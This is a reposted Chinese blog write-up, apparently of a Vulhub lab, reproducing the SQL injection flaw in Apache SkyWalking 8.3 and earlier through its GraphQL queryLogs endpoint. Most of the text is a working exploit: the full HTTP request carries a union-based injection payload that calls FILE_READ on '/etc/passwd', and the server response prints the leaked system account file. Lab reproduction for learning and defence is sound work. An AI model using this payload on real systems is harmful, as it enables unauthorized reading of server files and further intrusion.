欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > 【vluhub】skywalking

【vluhub】skywalking

2024/10/25 16:18:02 来源:https://blog.csdn.net/weixin_43372364/article/details/140850412  浏览:    关键词:【vluhub】skywalking

SkyWalking是一个开源监控平台,用于从服务和云原生基础设施收集、分析、聚合和可视化数据

低版本存在sql注入漏洞

访问地址

http://192.168.203.12:8080/graphql

burpsuite抓数据包

替换

{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

POST /graphql HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 413
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.203.12:8080
Referer: http://192.168.203.12:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive{"query":"query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--","paging":{"pageNum":1,"pageSize":1},"state":ALL, "queryDuration":{"start":"2021-02-07 1554","end":"2021-02-07 1554","step":"MINUTE"}}}}

response

HTTP/1.1 200 
X-Application-Context: application:8080
Date: Thu, 01 Aug 2024 07:51:24 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 1287{"data":{},"errors":[{"message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\"; SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1-- where  1=1  and time_bucket >= ? and time_bucket <= ? ) [22018-196]"}]}

参考

Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)-CSDN博客 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

vue3中ref和reactive的用法,区别和优缺点,以及使用场景 如何在地图导航上增加公司定位? WPF+MVVM案例实战-自定义按钮实现(带图片文字虚线实线边框切换) 10分钟快速学会Git使用 通信协议——UART Java IO教程之Java 输入流一口气讲完!